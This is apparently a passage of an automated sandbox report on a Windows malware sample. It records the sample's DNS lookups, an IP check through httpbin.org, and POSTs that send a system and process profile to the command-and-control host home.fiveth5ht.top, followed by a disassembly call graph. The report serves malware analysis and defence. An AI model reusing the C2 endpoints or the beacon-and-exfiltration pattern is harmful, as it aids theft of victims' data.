                                Dec 27, 2024 08:46:28.202306032 CET53552311.1.1.1192.168.2.6
                                Dec 27, 2024 08:46:29.975699902 CET5523353192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:29.975769997 CET5523353192.168.2.61.1.1.1
                                Dec 27, 2024 08:46:30.112359047 CET53552331.1.1.1192.168.2.6
                                Dec 27, 2024 08:46:30.112391949 CET53552331.1.1.1192.168.2.6

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 27, 2024 08:46:19.479916096 CET192.168.2.61.1.1.10xf4feStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:19.480072021 CET192.168.2.61.1.1.10x274aStandard query (0)httpbin.org28IN (0x0001)false
                                Dec 27, 2024 08:46:23.964118958 CET192.168.2.61.1.1.10xcfb0Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:23.964215994 CET192.168.2.61.1.1.10x6ecdStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                Dec 27, 2024 08:46:28.063817024 CET192.168.2.61.1.1.10xbbf6Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:28.063894033 CET192.168.2.61.1.1.10x5a40Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                Dec 27, 2024 08:46:29.975699902 CET192.168.2.61.1.1.10x529cStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:29.975769997 CET192.168.2.61.1.1.10x241fStandard query (0)home.fiveth5ht.top28IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 27, 2024 08:46:19.617517948 CET1.1.1.1192.168.2.60xf4feNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:19.617517948 CET1.1.1.1192.168.2.60xf4feNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:24.103276014 CET1.1.1.1192.168.2.60xcfb0No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:28.202284098 CET1.1.1.1192.168.2.60xbbf6No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                Dec 27, 2024 08:46:30.112359047 CET1.1.1.1192.168.2.60x529cNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • httpbin.org
                                • home.fiveth5ht.top

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.6497105.101.3.217806720C:\Users\user\Desktop\lolvgcpX19.exe
                                TimestampBytes transferredDirectionData
                                Dec 27, 2024 08:46:24.226077080 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 500650
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 35 39 31 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001155917", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
                                Dec 27, 2024 08:46:24.345796108 CET2472OUTData Raw: 4a 7a 73 6e 79 78 6c 4b 79 66 36 37 50 39 6e 66 34 32 51 68 4f 55 65 4a 66 43 2b 70 4b 4d 4a 53 6a 54 68 6e 66 46 4b 6e 55 63 56 64 51 67 36 6e 42 64 4f 6d 70 53 64 6f 78 64 53 70 43 46 32 75 61 63 59 33 6b 76 35 69 48 2b 38 66 77 5c 2f 6b 4b 62
                                Data Ascii: JzsnyxlKyf67P9nf42QhOUeJfC+pKMJSjThnfFKnUcVdQg6nBdOmpSdoxdSpCF2uacY3kv5iH+8fw\/kKbXtXx7+A3j39nf4g6r8P8Ax7pzW93ZyPJpeqwK76Vr+ls7La6rpVyVVZ7adV+ZcLLbzLJbXEcVxDLEnitf1rkOfZPxPk+X5\/kGYYfNMnzTDwxWBx2FlzUq1Kd1s0p06tOalSr0KsYV8PXhUoV6dOtTnCP8UcScN57
                                Dec 27, 2024 08:46:24.345848083 CET2472OUTData Raw: 2f 62 6e 5c 2f 41 43 65 52 52 45 64 30 62 7a 62 4e 69 66 36 37 6b 5c 2f 38 41 4c 78 39 50 36 5c 2f 7a 6f 32 76 4a 6a 65 6e 7a 39 63 5c 2f 38 41 74 72 5c 2f 50 2b 6c 42 70 54 36 5c 2f 49 68 62 5a 38 6d 7a 7a 4e 6e 6d 2b 56 39 6e 5c 2f 35 62 34 50
                                Data Ascii: /bn\/ACeRREd0bzbNif67k\/8ALx9P6\/zo2vJjenz9c\/8Atr\/P+lBpT6\/IhbZ8mzzNnm+V9n\/5b4P+fXnvmj\/V7E3\/AOriuJf8\/TH6dulP+fzH\/wCWaSHrH\/hQ\/wDdT535l\/1og\/l7\/Wg0KyDy5H2Id57D7Lz9s5\/z\/k0Z\/eb3SRHzb+bcf8sMd\/6\/54o2o+\/YnyW\/\/TLz+bzkf5\/Gnyb+HfzE8u
                                Dec 27, 2024 08:46:24.345895052 CET2472OUTData Raw: 46 50 51 5a 49 2b 42 6c 58 64 6e 74 69 76 36 39 2b 69 7a 68 4b 38 75 47 2b 4b 4d 37 78 46 57 74 57 71 35 6c 6e 31 44 42 65 30 72 56 4b 6c 53 55 6f 35 58 6c 39 4b 71 6e 46 31 4a 53 74 42 50 4d 35 51 69 6f 32 69 6e 47 55 55 6c 79 6e 38 49 5c 2f 54
                                Data Ascii: FPQZI+BlXdntiv69+izhK8uG+KM7xFWtWq5ln1DBe0rVKlSUo5Xl9KqnF1JStBPM5Qio2inGUUlyn8I\/TOx+Hjxbwbw7haVChRyjhrE5h7LD0adKEJ5zmdajJSVKMU6ko5PCcnK82pxk2+ZEP7v8Azmo6nZU7dPy\/w\/lS1\/Uh\/GZH5fv+n\/16d8\/+z+tOooA\/t4u7e0vbaWzv7aK8s7kBJ7add0cgJGG4IaORDh4po2
                                Dec 27, 2024 08:46:24.345913887 CET2472OUTData Raw: 4d 54 43 55 4d 52 34 73 34 66 45 56 73 76 68 6d 6c 54 41 65 45 32 52 59 6a 43 59 43 71 38 59 71 57 49 78 57 4a 38 51 73 30 79 71 4d 4a 78 79 5c 2f 45 34 50 47 31 48 37 4c 4d 71 7a 6f 30 36 47 49 70 75 57 49 56 4c 6d 56 53 45 5a 55 70 5c 2f 36 39
                                Data Ascii: MTCUMR4s4fEVsvhmlTAeE2RYjCYCq8YqWIxWJ8Qs0yqMJxy\/E4PG1H7LMqzo06GIpuWIVLmVSEZUp\/69\/QLxdfD+CePw9LMJ5VSzDxn4iw+Mx9KOCdXD4TDeG2Q5rOcJZjhsXgqa9rl1FVqlfD1FHDuqo8k3GrDcf49fFQ5\/4wq\/aaG7p\/xVf7G3Awf+rtfx7dB615r8TPHPxX+IemaJZ237K\/7XPgnUvD3iJPEmleIP
                                Dec 27, 2024 08:46:24.345978022 CET2472OUTData Raw: 2f 31 6e 2b 77 59 76 38 41 56 78 35 5c 2f 7a 32 37 30 47 6c 50 72 38 76 31 4b 32 33 2b 50 70 36 65 5a 4c 2b 4e 56 6d 5c 2f 68 66 4d 59 66 5c 2f 41 46 76 2b 66 35 5c 2f 35 4e 57 57 58 64 77 50 6e 66 69 4b 4b 54 72 35 33 32 50 30 5c 2f 44 38 71 59
                                Data Ascii: /1n+wYv8AVx5\/z270GlPr8v1K23+Pp6eZL+NVm\/hfMYf\/AFv+f5\/5NWWXdwPnfiKKTr532P0\/D8qY0fL\/AMf+fz6\/pQdHtPL8f+AVvnkaSFPMd\/8All5Z\/fzXH+f88gUSNu+5+++0fvf9b9P89qPs7yM2\/D+X\/LP6\/lTY2hbj77\/h\/rzx\/nt9elB2EZb+N4cHH72Tzetx+efz\/wAKZ5b+Y742zR\/wSReR+
                                Dec 27, 2024 08:46:24.346014977 CET2472OUTData Raw: 49 50 6b 6d 32 50 5c 2f 41 4d 38 35 44 39 66 77 7a 5c 2f 6e 69 71 4d 6d 6e 79 5c 2f 33 44 74 35 78 77 4f 5c 2f 75 54 5c 2f 51 6d 72 48 38 66 5c 2f 41 41 4c 2b 74 57 56 6b 66 2b 42 5c 2f 38 2b 5c 2f 5c 2f 41 4e 65 73 54 5c 2f 49 5c 2f 32 6c 53 6e
                                Data Ascii: IPkm2P\/AM85D9fwz\/niqMmny\/3Dt5xwO\/uT\/QmrH8f\/AAL+tWVkf+B\/8+\/\/ANesT\/I\/2lSnbX71\/WnyPpT9lDRLDxV4j+Ifw715HOj+O\/hprWk3Q48zzFvdNSOSAkqRPbQXV5dwOjAxzQRuMFQy9B8NbD49\/sj\/AAn+Na+I\/hroniTTtL1Hw\/P4Z1Cx1KG50fVLDUn8UW2v+Jtcs7S+lvrux0qKHw7bXdn
                                Dec 27, 2024 08:46:24.346081972 CET2472OUTData Raw: 30 38 38 77 6d 42 7a 66 48 34 57 72 69 49 59 7a 47 35 64 52 6c 6c 38 38 4a 67 38 64 68 63 58 42 59 69 63 36 73 4d 53 71 4c 6f 75 6e 55 6e 55 70 5c 2f 36 49 66 51 6f 7a 6e 4e 65 49 61 6d 63 65 48 66 43 64 61 6c 67 4f 49 61 48 44 66 45 57 63 5a 68
                                Data Ascii: 088wmBzfH4WriIYzG5dRll88Jg8dhcXBYic6sMSqLounUnUp\/6IfQoznNeIamceHfCdalgOIaHDfEWcZhjM2hy5RVyLE5pkeXVqGHrYeOMxazOOLzLBV6CngIUaaw86yxKqQp06n5z\/ABo\/4Kj+B\/ib\/wAEu\/hx+xpp\/hbx3Z\/HDTtH+F3w8+JXjO+0jwzF4J1v4WfB3xBrer+B9I0zxDa+KbnxZqN3ZLaeDZU07VPC
                                Dec 27, 2024 08:46:24.346101046 CET2472OUTData Raw: 5c 2f 68 5c 2f 55 30 79 70 4a 4f 33 34 31 48 57 68 74 37 58 7a 6c 5c 2f 58 7a 4b 73 76 66 5c 2f 41 48 76 38 61 62 35 66 7a 50 31 36 5c 2f 68 5c 2f 6b 66 35 78 56 79 71 39 42 31 45 54 70 74 5c 2f 6c 7a 54 4b 73 56 58 6f 43 6c 39 6e 35 5c 2f 71 52
                                Data Ascii: \/h\/U0ypJO341HWht7Xzl\/XzKsvf\/AHv8ab5fzP16\/h\/kf5xVyq9B1ETpt\/lzTKsVXoCl9n5\/qR+X7\/p\/9eo6sVHJ2\/Gg6Cq0f4j8qbVimP0\/H+hoNKfX5fqVvL9\/0\/8Ar1HViig0KUi\/x+n+HamVal7\/AO7\/AI1BsPt\/n8KDoIe7\/QfyqKrFV609n5\/h\/wAE2p1Pn+v\/AAf+DoFR+X7\/AKf\/AF6
                                Dec 27, 2024 08:46:24.346189976 CET2472OUTData Raw: 41 7a 57 6e 74 50 4c 38 66 2b 41 61 42 5c 2f 74 74 38 5c 2f 6d 66 75 76 33 66 38 41 79 31 39 50 38 61 67 6a 5c 2f 77 43 6d 6e 5c 2f 4c 50 37 50 38 41 75 34 77 65 6e 5c 2f 50 30 50 38 38 39 61 6d 6b 6a 33 4b 6a 37 35 50 72 35 67 34 35 2b 79 65 33
                                Data Ascii: AzWntPL8f+AaB\/tt8\/mfuv3f8Ay19P8agj\/wCmn\/LP7P8Au4wen\/P0P889amkj3Kj75Pr5g45+ye32L8R0qGNfL+RE8n97ceVH\/r\/+XX9eenFZgH9\/\/rl5uZPy9\/6+vrTP+Bxp\/wAtftHr39vT\/OeXx7PMzv2R8f8ATemfe\/j2P5pi\/wBV\/rv8\/rn35DoGSb\/k2PG\/73\/nr+X4dOlM+6yfx\/7En5dqe
                                Dec 27, 2024 08:46:24.346230030 CET2472OUTData Raw: 2b 33 6a 47 45 6b 70 52 6c 7a 52 6b 72 70 78 63 58 46 72 75 6d 6c 5a 72 35 6e 35 31 4b 56 61 45 6e 43 61 63 5a 52 64 70 4b 58 4e 47 61 39 59 74 4b 7a 38 6d 6a 45 6f 72 75 5c 2f 43 6e 68 6a 51 50 47 56 6c 34 59 6d 54 34 6e 66 43 44 77 4e 72 76 78
                                Data Ascii: +3jGEkpRlzRkrpxcXFrumlZr5n51KVaEnCacZRdpKXNGa9YtKz8mjEoru\/CnhjQPGVl4YmT4nfCDwNrvxC+NGvfs9\/CvwZ8QNf+Iek+J\/ij8XtB8NeDvE58HeF7vw58KfF3gXSb3WIfHnhfSNCufiB448E6dqHiHU4dNN5CGW4PmVtqcF18Crn9oTztHt\/Atj47ufAN\/p93q8dv4wtbzTxHaar4jOgPb4bwbpPiW703wRf
                                Dec 27, 2024 08:46:27.998560905 CET157INHTTP/1.1 200 OK
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:46:27 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 1
                                Connection: close
                                Data Raw: 30
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.6497215.101.3.217806720C:\Users\user\Desktop\lolvgcpX19.exe
                                TimestampBytes transferredDirectionData
                                Dec 27, 2024 08:46:28.323616982 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Dec 27, 2024 08:46:29.896974087 CET372INHTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:46:29 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.6497275.101.3.217806720C:\Users\user\Desktop\lolvgcpX19.exe
                                TimestampBytes transferredDirectionData
                                Dec 27, 2024 08:46:30.233782053 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 27, 2024 08:46:31.787430048 CET372INHTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:46:31 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.6497083.218.7.1034436720C:\Users\user\Desktop\lolvgcpX19.exe
                                TimestampBytes transferredDirectionData
                                2024-12-27 07:46:21 UTC52OUTGET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-27 07:46:21 UTC224INHTTP/1.1 200 OK
                                Date: Fri, 27 Dec 2024 07:46:21 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-27 07:46:21 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:02:46:15
                                Start date:27/12/2024
                                Path:C:\Users\user\Desktop\lolvgcpX19.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\lolvgcpX19.exe"
                                Imagebase:0xf80000
                                File size:4'502'528 bytes
                                MD5 hash:605F4D4C3E2BE9F71FE0974B6CE3C714
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:18.7%
                                  Total number of Nodes:466
                                  Total number of Limit Nodes:75
                                  execution_graph 61920 f91139 61934 fbbaa0 61920->61934 61922 f91148 61923 f91512 61922->61923 61924 f91161 61922->61924 61931 f90f00 61923->61931 61939 f922d0 _open 61923->61939 61924->61931 61938 f90150 _open 61924->61938 61928 f90150 _open 61928->61931 61930 f90f7b 61931->61928 61931->61930 61933 f875a0 _open 61931->61933 61940 fbd4d0 _open 61931->61940 61941 f94940 _open 61931->61941 61942 f93900 _open 61931->61942 61933->61931 61935 fbbac7 61934->61935 61937 fbbb60 61934->61937 61935->61937 61943 fa05b0 _open 61935->61943 61937->61922 61938->61931 61939->61931 61940->61931 61941->61931 61942->61931 61943->61937 62032 1034720 62036 1034728 62032->62036 62033 1034733 62035 1034774 62036->62033 62041 103476c 62036->62041 62042 1039270 62036->62042 62038 1034860 62045 1034950 62038->62045 62040 1034878 62041->62040 62049 10330a0 closesocket 62041->62049 62050 103a440 62042->62050 62044 1039297 62044->62038 62048 1034966 62045->62048 62046 1034aa0 gethostname 62047 10349c5 62046->62047 62046->62048 62047->62041 62048->62046 62048->62047 62049->62035 62073 103a46b 62050->62073 62051 103aa03 RegOpenKeyExA 62052 103ab70 RegOpenKeyExA 62051->62052 62053 103aa27 RegQueryValueExA 62051->62053 62056 103ac34 RegOpenKeyExA 62052->62056 62075 103ab90 62052->62075 62054 103aa71 62053->62054 62055 103aacc RegQueryValueExA 62053->62055 62054->62055 62062 103aa85 RegQueryValueExA 62054->62062 62058 103ab66 RegCloseKey 62055->62058 62059 103ab0e 62055->62059 62057 103acf8 RegOpenKeyExA 62056->62057 62077 103ac54 62056->62077 62060 103ad56 RegEnumKeyExA 62057->62060 62063 103ad14 62057->62063 62058->62052 62059->62058 62066 103ab1e RegQueryValueExA 62059->62066 62061 103ad9b 62060->62061 62060->62063 62064 103ae16 RegOpenKeyExA 62061->62064 62065 103aab3 62062->62065 62063->62044 62067 103ae34 RegQueryValueExA 62064->62067 62068 103addf RegEnumKeyExA 62064->62068 62065->62055 62069 103ab4c 62066->62069 62070 103af43 RegQueryValueExA 62067->62070 62072 103adaa 62067->62072 62068->62063 62068->62064 62069->62058 62071 103b052 RegQueryValueExA 62070->62071 62070->62072 62071->62072 62074 103adc7 RegCloseKey 62071->62074 62072->62070 62072->62071 62072->62074 62076 103afa0 RegQueryValueExA 62072->62076 62073->62051 62073->62063 62074->62068 62075->62056 62076->62072 62077->62057 62078 10370a0 62082 10370ae 62078->62082 62080 10371a7 62081 103717f 62081->62080 62090 1049320 closesocket 62081->62090 62082->62080 62082->62081 62085 104a8c0 62082->62085 62089 10371c0 socket ioctlsocket connect getsockname 62082->62089 62086 104a8e6 62085->62086 62087 104a903 recvfrom 62085->62087 62086->62087 62088 104a8ed 62086->62088 62087->62088 62088->62082 62089->62082 62090->62080 61944 104a080 61947 1049740 61944->61947 61946 104a09b 61948 1049780 61947->61948 61952 104975d 61947->61952 61949 1049925 RegOpenKeyExA 61948->61949 61948->61952 61950 104995a RegQueryValueExA 61949->61950 61949->61952 61951 1049986 RegCloseKey 61950->61951 61951->61952 61952->61946 61953 104b180 61954 104b2e3 61953->61954 61956 104b19b 61953->61956 61956->61954 61958 104b2a9 getsockname 61956->61958 61960 104b020 closesocket 61956->61960 61961 104af30 61956->61961 61965 104b060 61956->61965 61970 104b020 61958->61970 61960->61956 61962 104af63 socket 61961->61962 61963 104af4c 61961->61963 61962->61956 61963->61962 61964 104af52 61963->61964 61964->61956 61969 104b080 61965->61969 61966 104b0b0 connect 61967 104b0bf WSAGetLastError 61966->61967 61968 104b0ea 61967->61968 61967->61969 61968->61956 61969->61966 61969->61967 61969->61968 61971 104b052 61970->61971 61972 104b029 61970->61972 61971->61956 61973 104b04b closesocket 61972->61973 61974 104b03e 61972->61974 61973->61971 61974->61956 62091 104a920 62092 104a944 62091->62092 62093 104a94b 62092->62093 62094 104a977 send 62092->62094 62095 f8255d 62096 1309f70 62095->62096 62097 f8256c GetSystemInfo 62096->62097 62098 f82589 62097->62098 62099 f825a0 GlobalMemoryStatusEx 62098->62099 62106 f825ec 62099->62106 62100 f8263c GetDriveTypeA 62102 f82655 GetDiskFreeSpaceExA 62100->62102 62100->62106 62101 f82762 62103 f827d6 KiUserCallbackDispatcher 62101->62103 62102->62106 62104 f827f8 62103->62104 62105 f82842 SHGetKnownFolderPath 62104->62105 62107 f828c3 62105->62107 62106->62100 62106->62101 62108 f828d9 FindFirstFileW 62107->62108 62109 f82906 FindNextFileW 62108->62109 62110 f82928 62108->62110 62109->62109 62109->62110 62111 f83d5e 62114 f83d30 62111->62114 62113 f83d90 62114->62111 62114->62113 62115 f90ab0 62114->62115 62118 f905b0 62115->62118 62119 f907c7 62118->62119 62125 f905bd 62118->62125 62119->62114 62124 f9066a 62129 f906f0 62124->62129 62131 f907ce 62124->62131 62141 f973b0 _open 62124->62141 62125->62119 62125->62124 62125->62131 62139 f903c0 _open 62125->62139 62140 f97450 _open 62125->62140 62126 f90707 WSAEventSelect 62126->62129 62126->62131 62127 f907ef 62127->62131 62134 f90847 62127->62134 62135 f96fa0 62127->62135 62129->62126 62129->62127 62142 f876a0 62129->62142 62153 f97380 _open 62131->62153 62132 f909e8 WSAEnumNetworkEvents 62133 f909d0 WSAEventSelect 62132->62133 62132->62134 62133->62132 62133->62134 62134->62131 62134->62132 62134->62133 62136 f96fd4 62135->62136 62138 f96feb 62135->62138 62137 f97207 select 62136->62137 62136->62138 62137->62138 62138->62134 62139->62125 62140->62125 62141->62124 62143 f876c0 62142->62143 62144 f876e6 send 62142->62144 62143->62144 62145 f876c9 62143->62145 62146 f876d3 62144->62146 62152 f87704 62144->62152 62145->62146 62147 f8770b 62145->62147 62154 f872a0 _open 62146->62154 62155 f872a0 _open 62147->62155 62150 f8771c 62156 f8cb20 _open 62150->62156 62152->62129 62153->62119 62154->62152 62155->62150 62156->62152 61975 f829ff FindFirstFileA 61976 f82a31 61975->61976 61977 f82a5c RegOpenKeyExA 61976->61977 61978 f82a93 61977->61978 61979 f82ade CharUpperA 61978->61979 61981 f82b0a 61979->61981 61980 f82bf9 QueryFullProcessImageNameA 61982 f82c3b CloseHandle 61980->61982 61981->61980 61984 f82c64 61982->61984 61983 f82df1 CloseHandle 61985 f82e23 61983->61985 61984->61983 61986 fb95b0 61987 fb95c8 61986->61987 61989 fb95fd 61986->61989 61987->61989 61990 fba150 61987->61990 61991 fba15f 61990->61991 61999 fba246 61990->61999 61992 fba181 getsockname 61991->61992 61991->61999 61993 fba1d0 61992->61993 61994 fba1f7 61992->61994 62002 f9d090 _open 61993->62002 62003 fbef30 61994->62003 61997 fba1eb 62008 fc4f40 _open 61997->62008 61999->61989 62000 fba20f 62000->61999 62007 f9d090 _open 62000->62007 62002->61997 62004 fbefa8 62003->62004 62006 fbef47 62003->62006 62004->62006 62009 f8c960 _open 62004->62009 62006->62000 62007->61997 62008->61999 62009->62006 62157 fb8b50 62158 fb8b6b 62157->62158 62159 fb8be6 62157->62159 62158->62159 62160 fb8b8f 62158->62160 62161 fb8bf3 62158->62161 62247 f96e40 select 62160->62247 62190 fba550 62161->62190 62165 fb8ba1 62166 fb8cd9 SleepEx 62165->62166 62171 fb8cb2 62165->62171 62186 fb8bb5 62165->62186 62176 fb8d14 62166->62176 62167 fb8c1f connect 62168 fb8c35 62167->62168 62174 fba150 2 API calls 62168->62174 62169 fba150 2 API calls 62175 fb8dff 62169->62175 62170 fb8e85 62170->62159 62178 fb8eae 62170->62178 62253 f92a00 _open 62170->62253 62171->62159 62171->62169 62171->62170 62187 fb8c4d 62174->62187 62175->62170 62251 f9d090 _open 62175->62251 62176->62171 62177 fb8d43 62176->62177 62183 fba150 2 API calls 62177->62183 62178->62159 62254 f878b0 closesocket 62178->62254 62179 fb8c8b 62179->62165 62182 fb8dc8 62179->62182 62250 fbb100 _open 62182->62250 62183->62186 62184 fb8e67 62252 fc4fd0 _open 62184->62252 62186->62159 62249 fc50a0 _open 62186->62249 62187->62179 62248 fc50a0 _open 62187->62248 62191 fba575 62190->62191 62194 fba597 62191->62194 62258 f875e0 62191->62258 62193 fba6d9 62196 fba709 62193->62196 62206 fba713 62193->62206 62273 f92a00 _open 62193->62273 62194->62193 62195 fbef30 _open 62194->62195 62197 fba63a 62195->62197 62198 f878b0 2 API calls 62196->62198 62196->62206 62202 fba641 62197->62202 62207 fba69b 62197->62207 62198->62206 62199 fb8bfc 62199->62159 62199->62167 62199->62168 62199->62171 62201 fba7e5 62205 fba811 setsockopt 62201->62205 62211 fba87c 62201->62211 62221 fba8ee 62201->62221 62202->62201 62275 fc4fd0 _open 62202->62275 62205->62211 62214 fba83b 62205->62214 62206->62199 62274 fc50a0 _open 62206->62274 62271 f9d090 _open 62207->62271 62209 fba6c9 62272 fc4f40 _open 62209->62272 62211->62221 62278 fbb1e0 _open 62211->62278 62214->62211 62276 f9d090 _open 62214->62276 62215 fbaf56 62215->62193 